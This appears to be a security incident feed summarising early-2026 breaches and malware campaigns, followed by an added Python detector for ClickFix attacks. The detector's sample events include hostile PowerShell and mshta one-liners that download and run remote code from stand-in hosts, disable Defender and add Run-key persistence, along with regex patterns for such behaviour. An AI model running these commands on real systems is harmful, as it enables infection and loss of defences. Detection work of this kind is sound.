Crunchyroll
March 12, 2026
•[ data leak, malware, third-party risk ]
The Record reported that an unidentified threat actor claimed to have breached an employee account at Telus in India (a business-process vendor for Crunchyroll with access to support tickets). The attacker said they infected the employee's device with malware and stole about 100GB of data from Crunchyroll's ticketing system. The outlet reported that samples included IP addresses, email addresses, and other information related to customer-service tickets. Screenshots showed access to Crunchyroll's platforms, including Slack, Zendesk, and Google Workspace; the hacker claimed the breach occurred on March 12, 2026 and that access was revoked within 24 hours.
An undisclosed organization
March 12, 2026
•[ ransomware, social engineering, data theft ]
IBM X-Force described a case where a threat actor remained on a compromised server for more than a week and stole data during an Interlock ransomware intrusion. The attack began with ClickFix social engineering and later deployed a PowerShell backdoor called Slopoly (likely AI-assisted), alongside other components such as NodeSnake and InterlockRAT. The article is a case-study/campaign description and does not name the victim organization or quantify the affected records beyond describing persistence and data theft.
Undisclosed cryptocurrency organization
March 9, 2026
•[ cryptocurrency, social engineering, cloud compromise ]
The Hacker News reported (citing Google Cloud) that North Korea-linked UNC4899 conducted a sophisticated 2025 cloud compromise targeting an unnamed cryptocurrency organization, stealing millions in cryptocurrency. The intrusion began with social engineering that tricked a developer into downloading a malicious archive for a supposed open-source collaboration; the developer then transferred the file to a work device via AirDrop. After malicious Python code executed and a binary masquerading as kubectl ran, the attackers pivoted into the cloud environment and abused legitimate DevOps workflows to harvest credentials, escape container confines, and tamper with Cloud SQL databases to modify financial logic enabling theft. This is coded as a confirmed successful intrusion with financial theft.
Undisclosed telecom company in South America
March 6, 2026
•[ cyberespionage, threat cluster, malware ]
Cisco Talos reported a China-linked threat cluster tracked as UAT-9244 has targeted telecommunications infrastructure in South America since 2024, using multiple implants across Windows, Linux, and edge devices. The toolset described includes TernDoor (Windows), PeerTime (Linux), and BruteEntry (edge devices used for mass scanning and brute forcing services like SSH, Postgres, and Tomcat). The report describes tradecraft and malware but does not identify a single named victim organization or a bounded primary-effect incident suitable for a discrete event record.
Passaic County
March 4, 2026
•[ malware, cyberattack, availability disruption ]
Passaic County, New Jersey reported a malware attack that disrupted county IT systems and took down phone lines used across government offices. The county first announced the phone outage the morning of March 4 and later confirmed the same day that the outage was caused by a cyberattack. Officials said they were working with federal and state partners to investigate and contain the issue and would provide updates once resolved. No data theft, ransomware demand, or impacted record counts were disclosed in the public statement; the confirmed primary effect is availability disruption affecting communications and IT services.
Undisclosed Israeli individuals' smartphones
March 1, 2026
•[ malware, phishing, spyware ]
A trojanized fake Red Alert app delivered through spoofed SMS messages targeted Israeli users and, when installed, enabled theft of messages, contacts, location data, and other device information from affected smartphones.
At least one Hungarian government ministry
March 1, 2026
•[ credential leak, infostealer, stealer logs ]
Bellingcat identified 795 Hungarian government email/password combinations circulating in breach data across 12 of 13 ministries, including defence, foreign affairs, interior, and finance; stealer logs indicated that 97 machines across government departments may have been compromised, with some logs dated as recently as March 2026.
At least one Ukrainian government organization
March 1, 2026
•[ spear-phishing, malware, cyber espionage ]
Ghostwriter, also tracked as FrostyNeighbor, UNC1151, UAC-0057, TA445, PUSHCHA, Storm-0257, and related names, conducted a March 2026 spear-phishing campaign against Ukrainian government organizations. The campaign used malicious PDF lures impersonating Ukrtelecom, geofenced delivery to Ukrainian IP addresses, JavaScript PicassoLoader, host fingerprinting, and selective delivery of Cobalt Strike Beacon. Although no specific Ukrainian government agency was publicly named, reporting described successful compromise activity against Ukrainian government targets; no stolen data volume was reported.
Centre for Information Technologies of the State (CTIE)
February 26, 2026
•[ malware, data leak, government ]
CTIE detected malware on a system used to manage government mobile-device access and later said an external actor accessed device-holder information and device characteristics. The temporary loss of mobile access to internal state services resulted from CTIE isolating the affected system as a precaution.
Undisclosed Middle East entity
February 24, 2026
•[ ransomware, cyberattack, data breach ]
Symantec and Carbon Black linked Lazarus to a Medusa ransomware attack against an undisclosed Middle East entity; the same reporting noted an unsuccessful attempt against a U.S. healthcare organization, which is not coded here as a successful event.
Local entities in the Cayman Islands (malicious PDF campaign)
February 19, 2026
•[ phishing, malware, email security ]
RCIPS warned that a malicious PDF was being sent to local entities from a compromised email address. The PDF contained a VIEW PDF link that, when clicked, installs malware; authorities stated they were already aware of some local systems being compromised because recipients clicked the embedded link. The public advisory provided guidance to treat unexpected PDFs as suspicious, avoid clicking the embedded link, and report incidents.
OpenClaw / ClawHub ecosystem (AI assistant skills) – multi-victim campaign
February 19, 2026
•[ infostealer, AI assistant security, credential theft ]
This TecMundo report describes security researchers warning about a malware operation targeting the OpenClaw/ClawHub ecosystem that, for the first time, is reported to specifically steal secrets tied to an AI assistant ecosystem (tokens, API keys, and other assistant-related data). The article frames the activity as a broad distribution campaign (malicious skills/add-ons with infostealer behavior) that can compromise a victim's digital identity by extracting authentication artifacts and credentials used to access accounts and services.
At least one undisclosed cryptocurrency company
February 10, 2026
•[ malware, cryptocurrency, AI-generated video ]
BleepingComputer reported that North Korean threat actor UNC1069 ran tailored campaigns using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector, with a financially motivated objective.
Cuero Chamber of Commerce
January 26, 2026
•[ malware, social engineering, ClickFix ]
The Cuero Chamber of Commerce reported a malware/social engineering incident affecting its web properties after a customer noticed suspicious activity in an email sent January 26. The chamber said users registering for an event were shown a CAPTCHA prompt and then instructed to press Windows+R and paste/run content, behavior consistent with ClickFix social engineering designed to trick victims into executing malicious commands on their own devices. The chamber stated that the Cuero Development Corporation website was the only confirmed security breach and that significant data loss occurred, and it believed the malware was introduced via a third-party platform (Shopify) used for event registration. The chamber said it could not determine how many people or organizations were affected and implemented additional safeguards.
Viafier Retica
January 22, 2026
•[ malware, data leak, unauthorized access ]
The Swiss rail operator Viafier Retica shut down its Vereina car-shuttle online ticket shop after discovering malware on the system. The organization stated that attackers likely accessed the web shop database, which may contain customer and employee contact details and hashed passwords. Users were advised to change passwords used on other services. The incident caused service disruption to online ticket sales while containment and investigation actions were undertaken.
At least one Afghan government worker
January 20, 2026
•[ phishing, malware, data exfiltration ]
The Record reported that attackers targeted Afghan government workers with phishing emails disguised as official correspondence from the office of the country's prime minister. Researchers said the campaign, first detected in December, used a decoy document resembling a government letter (including a forged signature) to entice recipients in ministries and administrative offices to open it. Once opened, the document delivered malware dubbed FalseCub, designed to collect and exfiltrate data from infected computers. The report is focused on the campaign and malware behavior; it does not list specific compromised agencies, confirmed infection counts, or stolen data volumes, so impacts are coded as undetermined.
Medical Practice of Dr. Richard Swift
January 12, 2026
•[ malware, cyberattack, data leak ]
DataBreaches reported on a class action lawsuit alleging that a Manhattan plastic surgery practice run by Dr. Richard Swift was compromised by a malware-related cyberattack in 2025 and that sensitive patient information was posted online. The suit alleged that a site hosted outside the U.S. displayed personal identifiers and medical record details for at least 22 patients, and that affected patients only learned about the breach after attackers contacted them directly. DataBreaches noted the same threat actors were linked to attacks on other plastic surgery practices and described a recurring pattern where attackers approached patients with demands in exchange for removing posted information. Public reporting did not confirm whether the practice paid, and the article noted the leak site later appeared offline.
Langley Twigg Law
January 11, 2026
•[ cyberattack, data breach, malware ]
Langley Twigg Law (Napier, New Zealand) stated it was hit by a cyberattack on January 11, 2026. The firm said digital forensics and cyber specialists confirmed that a malicious third party launched a virus on its IT network, which was not protected by its cybersecurity software at the time. The firm reported the attacker extracted a portion of data from its file server containing internal operational information and some client documents. Langley Twigg said it disconnected its network from the internet, notified the Privacy Commissioner and police, and was working to determine exactly what information was affected before contacting impacted clients.
At least one telecom company in South Asia
January 8, 2026
•[ espionage, malware, threat intelligence ]
The Hacker News summarized Cisco Talos research attributing espionage-focused intrusions to a China-nexus actor tracked as UAT-7290. The campaign reportedly targets telecom entities in South Asia and Southeastern Europe, performing extensive reconnaissance followed by compromise activity that can lead to deployment of malware families including RushDrop, DriveSwitch, and SilentRaid. The article is threat-intelligence reporting focused on actor behavior, tooling, and geographic targeting, and it does not provide a bounded, single victim incident record with confirmed impact metrics (e.g., downtime or specific data stolen) for one named organization.
At least one Booking.com user
January 7, 2026
•[ phishing, social engineering, malware ]
Research summarized by Cybernews described a ClickFix social-engineering campaign abusing Booking.com branding. Victims receive phishing emails about a cancelled reservation and a large charge; clicking through leads to a fake Booking.com page with a fake refresh flow and a simulated Blue Screen of Death. The page instructs the user to paste/run a malicious script (PowerShell) via Windows Run, which then fetches and executes remote code, disables Windows Defender, and establishes persistence with C2 connectivity. The link is campaign/threat-intel reporting and does not provide a single confirmed victim organization or a bounded incident count, but it describes successful infections driven by user-executed commands.
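The two ClickFix entries above (the Cuero Chamber of Commerce CAPTCHA lure and the Booking.com cancelled-reservation lure) describe the same user-executed chain: a Windows+R Run prompt, a pasted PowerShell or mshta one-liner, then a download cradle, Windows Defender tampering and persistence. The following is an added example and not code from any of the cited reports or vendors: a heuristic detector in Python over constructed Sysmon Event ID 1-style process-creation records (parent image, image, command line). It decodes any -EncodedCommand payload before pattern matching and requires at least two independent indicators before flagging, so a lone interactive PowerShell launched from Explorer is not an alert. The regexes, the threshold, the field layout and every sample command line and hostname are assumptions made for this demo.

```python
"""Heuristic ClickFix detector over Windows process-creation records.

Added example, not taken from any of the reports summarised above. Field
names mirror Sysmon Event ID 1 / Windows 4688 (ParentImage, Image,
CommandLine), but every event below is constructed for the demo.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Shells and LOLBins that a Win+R (Run dialog) paste typically lands in.
RUN_TARGETS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# (label, regex) applied to the command line plus any decoded -enc payload.
# These are illustrative patterns, not a vendor rule set.
PATTERNS = [
    ("hidden window", r"-w(?:indowstyle)?\s+h(?:idden)?\b"),
    ("download cradle", r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b"),
    ("in-memory execution", r"\biex\b|invoke-expression"),
    ("Defender tampering", r"set-mppreference\s+-disable\w+|add-mppreference\s+-exclusionpath"),
    ("persistence", r"currentversion\\run\b|schtasks(?:\.exe)?\s+/create|new-scheduledtask"),
    ("LOLBin fetching a URL", r"\b(?:mshta|regsvr32|rundll32)(?:\.exe)?\s+\S*https?://"),
]
# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand; payload is base64 of UTF-16LE.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_command_line(cl: str) -> tuple[str, bool]:
    """Return the command line with any encoded payload decoded and appended."""
    m = ENC_RE.search(cl)
    if not m:
        return cl, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return cl, False
    return f"{cl}\n{decoded}", True


def score_event(ev: ProcEvent) -> list[str]:
    """List the indicators present on one process-creation event."""
    reasons = []
    if ev.parent_image.lower().endswith("explorer.exe") and ev.image.lower().endswith(RUN_TARGETS):
        reasons.append("shell spawned by explorer.exe (Run dialog / user-typed)")
    text, was_encoded = expand_command_line(ev.command_line)
    if was_encoded:
        reasons.append("encoded command")
    for label, pat in PATTERNS:
        if re.search(pat, text, re.I):
            reasons.append(label)
    return reasons


def detect_clickfix(events, threshold: int = 2):
    """Flag events carrying at least `threshold` indicators. A single one (an admin
    opening PowerShell from Explorer) is too noisy to alert on by itself."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev, reasons))
    return hits


def _enc(ps: str) -> str:
    """Encode a PowerShell snippet the way -EncodedCommand expects (demo helper)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry; hostnames use the reserved .invalid TLD
    # Booking.com-style lure: pasted into Win+R, hidden window, cradle piped to iex
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iwr http://lure.example.invalid/fix.ps1 -UseBasicParsing | iex"'),
    # Same chain base64-encoded; also disables Defender real-time monitoring and adds a Run key
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell -nop -w hidden -enc " + _enc(
        "Set-MpPreference -DisableRealtimeMonitoring $true; "
        "iex (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/p'); "
        r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d C:\Users\Public\u.exe")),
    # CAPTCHA-style lure handing mshta a remote URL
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://verify.example.invalid/captcha"),
    # Benign: a user opening an interactive PowerShell from Explorer (one indicator only)
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell -NoExit -Command Get-ChildItem"),
    # Benign: scheduled backup script started by a service host (no indicators)
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS,
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for ev, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(ev.image.rsplit("\\", 1)[-1], "->", ", ".join(reasons))
```

On the constructed events the first three are flagged and the two benign ones are not. In production the same logic would also want the Explorer RunMRU registry key (the Run dialog's history) and a clipboard source, since ClickFix command lines are short-lived and the victim's own account runs them.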